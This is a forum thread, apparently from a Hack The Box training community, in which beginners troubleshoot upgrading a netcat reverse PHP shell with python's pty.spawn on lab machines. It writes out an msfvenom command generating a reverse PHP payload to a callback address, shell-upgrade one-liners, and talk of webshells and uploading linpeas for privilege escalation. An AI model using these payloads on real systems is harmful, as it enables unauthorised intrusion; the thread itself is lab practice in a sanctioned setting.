Python pty.spawn not working

edited May 18 in Off-topic

I'm at the point where I have a reverse php shell using netcat, and when I try to spawn a shell using "python -c import pty; pty.spawn('/bin/bash');" my shell does not spawn. The shell either becomes unresponsive or just nothing happens and I'm left with the default shell. I know this should work on this machine and that this is exactly when/where others have run the same command successfully. I am newer to pentesting, so is there another reason that this may not be working correctly? Thanks

Comments

  • Check if python is actually present, or if python3 is. Accordingly, run that command.

    If my hints help you out, remember to +respect me

  • Also it should be

    python -c 'import pty; pty.spawn("/bin/sh")'


  • I'm positive that it's present. Just my command doesn't work when I am literally watching an IppSec video where his does.

  • Well he's using /bin/bash, but I did try both, same result unfortunately

  • @JWindy92 your command above was in an incorrect format. See @thesithlord's above. Quotes are very important.

  • Well, I've tried the single and double quotes in both orientations, and that was a typo in the post, but in my console I was not missing the second quotation around /bin/bash.

    I've edited the original

  • @JWindy92 said:

    > I've edited the original

    Your edited one still has a typo.

    Can you check you've run python -c 'import pty; pty.spawn("/bin/sh")' - note single quote after the -c and double quotes around /bin/bash?

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • Yea I was already certain I had run it both ways just to make sure, but I just went and checked again, copy and pasted your command, and still nothing. My shell doesn't exit necessarily, just seems to kind of hang

  • Ok - that is a little bit odd.

    For clarity, when you run python -c import pty; pty.spawn("/bin/sh") it should hang because all you've done is run python -c import pty and then tried to issue a python command to the shell interpreter.

    However if you have enclosed the whole string, it should be treated as a blob to pass to python. This doesn't always work (I find "shell upgrades" break often enough that I only do them if I really, really need to), but I get you are following a walkthrough where it is used, so it should work unless something on the box has changed since then.

    Try it with a bash shell to see if that makes a difference.

    TazWake

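The quoting behaviour discussed in the comments above, as an added example that is not part of the original thread: a harmless stand-in function named `python` (an assumption for illustration; nothing is spawned) prints the argument list the shell hands over for each command line quoted in the thread. The variable names and the `parse` helper are hypothetical.

```shell
#!/bin/sh
# Added illustration: which arguments would the interpreter receive for each
# quoting style? `python` here is a stand-in function, not the real binary.

# Stand-in for the interpreter: report argc and every argument it was given.
python() {
    printf 'argc=%d' "$#"
    for arg in "$@"; do printf ' <%s>' "$arg"; done
    printf '\n'
}

# parse LINE: let the shell parse LINE as if it had been typed. The subshell
# keeps a syntax error from aborting the caller; stderr is discarded because
# the wording of the error differs between shells.
parse() {
    ( eval "$1" ) 2>/dev/null
}

# Constructed inputs: the command lines as they are quoted in the thread.
SINGLE_OUTER="python -c 'import pty; pty.spawn(\"/bin/sh\")'"
DOUBLE_OUTER="python -c \"import pty; pty.spawn('/bin/bash');\""
UNQUOTED='python -c import pty; pty.spawn("/bin/sh")'
FIRST_HALF='python -c import pty'   # the part of UNQUOTED before the ';'

# SINGLE_OUTER / DOUBLE_OUTER: the whole statement arrives as ONE argument
#   after -c, whichever quote character is on the outside.
# FIRST_HALF: without quotes the code given to -c is just the word "import".
# UNQUOTED: the shell splits at ';' and the bare '(' is then shell syntax,
#   so the interpreter never receives the pty code at all.
for line in "$SINGLE_OUTER" "$DOUBLE_OUTER" "$FIRST_HALF" "$UNQUOTED"; do
    printf '%s\n  -> ' "$line"
    parse "$line" || printf 'rejected by the shell (status %d)\n' "$?"
done
```

Running the same check with the real command line from a session shows at a glance whether the quotes survived copy and paste.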

  • I was using a bash shell, but I tried both for the sake of being thorough. I'm not even following the walkthrough necessarily in order to exploit the machine. The only reason I pulled it up in the first place was because my shell upgrade wasn't working and I wanted to double check that I wasn't doing anything wrong. However we both get a shell via nc, and running the code on the machine, then his upgrade works and mine doesn't. So I'm just at a loss.

  • edited May 18

    Again I'm new, this is the msfvenom command I'm using,
    msfvenom -p php/reverse_php LHOST=10.10.14.54 LPORT=1234 -f raw > shell2.htb

    any red flags there?

    EDIT: I guess I should mention the .htb extension is being run as .php by the server. Not sure if you would know/remember that if you maybe haven't done the box before or in a while since you're more advanced than I am

  • What is the machine?

    TazWake


  • I've had trouble with msf PHP shells before where I couldn't run certain interactive commands. I try to stay away from them when I can. It's been a while though since I've seen this.
    You could try getting a shell through another method (e.g. a simple php webshell and then running a reverse shell one-liner as the command).

  • @TazWake said:
    > What is the machine?

    I just try to run following on the foothold of Magic, not working.
    python3 -c 'import pty; pty.spawn("/bin/sh")'

  • @6uta said:
    > I just try to run following on the foothold of Magic, not working.
    > python3 -c 'import pty; pty.spawn("/bin/sh")'

    Hey. The command is right.
    Try socat interactive shell, if python/python3 is not present.
    But I'm sure your command is right.

    What response exactly do you get after executing the python pty script?

  • @zaicurity said:
    > I've had trouble with msf PHP shells before where I couldn't run certain interactive commands. I try to stay away from them when I can. It's been a while though since I've seen this.
    > You could try getting a shell through another method (e.g. a simple php webshell and then running a reverse shell one-liner as the command).

    Maybe because I don't know it well enough, but I never understood the fuss of Metasploit: it's confusing that it's like a shell but not really, and if you get used to it: on any half decent Windows machine the AV will pick it up and throw you out.
    Never even thought of using it. I just don't like to use stuff that I don't know what it's doing exactly... The benefits I know of don't compare to all the downsides I experienced with it.

    That being said: @6uta, you generated a meterpreter payload, and you try to upgrade that session to one with auto complete. That it?

    Not sure if meterpreter can. My suggestion would be to stay away from meterpreter sessions whenever you have a choice.

  • @6uta said:

    > I just try to run following on the foothold of Magic, not working.
    > python3 -c 'import pty; pty.spawn("/bin/sh")'

    That should work on Magic. When you say it is "not working", what actually happens? Does nothing happen or do you get an error message?

    @gnothiseauton

    > Maybe because I don't know it well enough, but I never understood the fuss of Metasploit:

    I agree. Sometimes it can make life easier but all too often the varying payloads just confuse people. People expect everything to be a meterpreter shell but it rarely works that way.

    TazWake


  • If you need a shell that can use su or sudo, you can use /usr/bin/script -qc /bin/bash /dev/null on any Linux box as far as I know. It won't give you tab complete or command history, though.

    marlasthemage

  • @TazWake said:

    > @6uta said:
    >
    > > I just try to run following on the foothold of Magic, not working.
    > > python3 -c 'import pty; pty.spawn("/bin/sh")'
    >
    > That should work on Magic. When you say it is "not working", what actually happens? Does nothing happen or do you get an error message?

    Sorry to not describe clearly.
    The php reverse shell became unresponsive once I sent: python -c "import pty; pty.spawn('/bin/bash');"
    But everything is working fine if I use a Perl reverse shell.

  • @6uta said:

    > Sorry to not describe clearly.
    > The php reverse shell become unresponsive once I sent: python -c "import pty; pty.spawn('/bin/bash');"
    > But everything is working fine if I use perl reverse shell.

    Glad to hear you've got a solution, even if it is far from ideal.

    I've just tried on Magic and this worked: python3 -c 'import pty; pty.spawn("/bin/bash")', but I can't see why using the double/single quotes the other way round should make a difference.

    TazWake


  • edited July 6

    I'm having the same issue. But in my case, it closes out my reverse connection and knocks me to my host machine terminal.

    Here is the output -

    https://imgur.com/a/Nl4S4Ei

    What will be a solution for this? @TazWake

  • I am not sure. Does this happen every time you try it? How long can you keep a shell if you don't try to upgrade it?

    You don't actually need an upgraded shell on the box you are looking at there.

    As an alternative, you could try using Metasploit as that definitely works with the shell upgrade you've tried.

    But, realistically, other than a more attractive path shown on the command line, there isn't a huge advantage to doing this.

    TazWake


  • edited July 7
    Sorry, this was a mistake comment.

  • edited July 7

    @dbstart09, it kind of looks like instead of using a single quote, you used the tick mark under the tilde. If it is in fact a single quote, then I'm not sure why it's not working for you.

    marlasthemage

  • Thanks, @TazWake and @marlasthemage now I got the shell as tomcat.

    But now a new problem is what to do next. Whenever I go each directory only has read-only permissions. Try to download linpeas but getting this "Could not resolve the hostname: github.com".

    Eventually, tried Netcat listener on tomcat shell and sent linpeas from my local machine. Now I can't run it. With sudo it asks for the password for tomcat and I put what I have but no use at all.

    Any hint on what to try next?

    TIA

  • @dbstart09 said:

    > Thanks, @TazWake and @marlasthemage now I got the shell as tomcat.
    >
    > But now a new problem is what to do next. Whenever I go each directory only has read-only permissions. Try to download linpeas but getting this "Could not resolve the hostname: github.com".
    >
    > Eventually, tried Netcat listener on tomcat shell and sent linpeas from my local machine. Now I can't run it. With sudo it asks for the password for tomcat and I put what I have but no use at all.
    >
    > Any hint on what to try next?

    You will get better answers if you ask this on the thread for the specific box.

    Most HTB boxes will prevent you accessing internet resources. You need to download to your machine and then upload to the box.

    If things are read-only, you can still read them.

    TazWake
